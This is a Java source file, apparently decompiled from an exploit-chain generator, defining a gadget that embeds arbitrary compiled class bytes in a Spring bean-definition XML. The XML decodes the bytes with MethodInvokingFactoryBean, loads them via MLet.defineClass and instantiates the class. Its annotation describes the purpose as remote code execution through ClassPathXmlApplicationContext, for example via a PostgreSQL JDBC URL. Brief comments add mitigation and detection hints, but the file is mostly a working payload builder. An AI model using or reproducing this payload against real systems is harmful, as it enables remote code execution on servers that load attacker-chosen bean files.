package com.ar3h.chains.gadget.impl.common.other;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.util.CommonUtil;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;
import java.util.Objects;
import org.apache.commons.codec.binary.Base64;
import org.springframework.web.context.support.XmlWebApplicationContext;

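/**
 * Gadget that wraps compiled class bytes in a Spring bean-definition XML document and returns
 * that document as text.
 *
 * <p>The {@link #template} declares three cooperating beans: a {@code MethodInvokingFactoryBean}
 * that Base64-decodes the embedded value, a {@code javax.management.loading.MLet} class loader
 * whose {@code defineClass} factory method receives the decoded bytes, and a final bean produced
 * by calling {@code newInstance} on the resulting class. A Spring application context that loads
 * this document therefore instantiates the embedded class.
 *
 * <p>Security relevance (review note): the annotation below describes the intended scenario as a
 * {@code ClassPathXmlApplicationContext} loading an XML file, with a PostgreSQL JDBC URL given as
 * the example entry point. The corresponding mitigation is to never let untrusted input choose a
 * bean-definition location or the properties of a JDBC URL. For detection, a bean definition that
 * combines {@code MethodInvokingFactoryBean} with {@code javax.management.loading.MLet} and a
 * {@code defineClass} factory method is a strong signal, since the combination has no ordinary
 * configuration purpose.
 *
 * <p>Not thread-safe: {@link #invoke} stores the context in an instance field that
 * {@link #getObject} reads afterwards, without synchronization, so one instance must not serve
 * concurrent invocations.
 */
@GadgetAnnotation(name = "将字节码封装进spring bean.xml中，返回xml文件内容", alias = "sbxcl", description = "适用于ClassPathXmlApplicationContext加载xml文件场景，例如在PostgreSQL jdbc url利用，通过加载bean.xml文件实现字节码执行RCE", dependencies = {"spring-bean"}, authors = {Authors.xcxmiku}, priority = 20)
@GadgetTags(tags = {Tag.Other}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/other/SpringBeanXmlClassLoader.class */
public class SpringBeanXmlClassLoader implements Gadget {
    // Set by invoke(); getObject() dereferences it, so it must be assigned before getObject() runs.
    GadgetContext context;

    // Bean-definition template with two %s placeholders: the Base64 text of the class bytes, then
    // their length (the third argument passed to defineClass). Left public, static and non-final
    // because code outside this file may read or reassign it.
    public static String template = "<beans xmlns=\"http://www.springframework.org/schema/beans\"\n       xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n       xsi:schemaLocation=\"http://www.springframework.org/schema/beans\n                           http://www.springframework.org/schema/beans/spring-beans.xsd\">\n    <bean id=\"decoder\" class=\"org.springframework.beans.factory.config.MethodInvokingFactoryBean\">\n        <property name=\"staticMethod\" value=\"javax.xml.bind.DatatypeConverter.parseBase64Binary\"/>\n        <property name=\"arguments\">\n            <list>\n                <value>%s</value>\n\n            </list>\n\n        </property>\n\n    </bean>\n\n    <bean id=\"classLoader\" class=\"javax.management.loading.MLet\"/>\n    <bean id=\"clazz\" factory-bean=\"classLoader\" factory-method=\"defineClass\">\n        <constructor-arg ref=\"decoder\"/>\n        <constructor-arg type=\"int\" value=\"0\"/>\n        <constructor-arg type=\"int\" value=\"%s\"/>\n    </bean>\n\n    <bean factory-bean=\"clazz\" factory-method=\"newInstance\"/>\n</beans>";

    /**
     * Renders {@link #template} for the given class bytes and registers the result in the gadget
     * context under {@code ContextTag.CACHE_FILES_MAP}.
     *
     * <p>The registered map holds one entry: a random 10-character name followed by
     * {@code XmlWebApplicationContext.DEFAULT_CONFIG_LOCATION_SUFFIX}, mapped to the UTF-8 bytes
     * of the rendered document. UTF-8 is named explicitly because the template carries no XML
     * encoding declaration and the previous platform-default encoding was not deterministic.
     *
     * @param bArr class bytes to embed; must not be {@code null}
     * @return the rendered bean-definition XML
     * @throws NullPointerException if {@code bArr} is {@code null}, or if {@link #invoke} has not
     *     yet assigned the context
     */
    public String getObject(byte[] bArr) {
        Objects.requireNonNull(bArr, "bArr");
        String xml = String.format(template, Base64.encodeBase64String(bArr), bArr.length);
        String fileName = CommonUtil.getRandomString(10) + XmlWebApplicationContext.DEFAULT_CONFIG_LOCATION_SUFFIX;
        HashMap<String, byte[]> cachedFiles = new HashMap<>();
        cachedFiles.put(fileName, xml.getBytes(StandardCharsets.UTF_8));
        this.context.put(ContextTag.CACHE_FILES_MAP, cachedFiles);
        return xml;
    }

    /**
     * Stores the context, asks the chain for the next stage's output, and renders it as XML.
     *
     * @param gadgetContext context that receives the cached-file map
     * @param gadgetChain chain whose {@code doCreate} result is cast to {@code byte[]}
     * @return the rendered bean-definition XML, as a {@code String}
     * @throws Exception whatever {@code doCreate} throws; a non-{@code byte[]} result fails the
     *     cast with {@code ClassCastException}
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        this.context = gadgetContext;
        byte[] classBytes = (byte[]) gadgetChain.doCreate(gadgetContext);
        return getObject(classBytes);
    }
}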
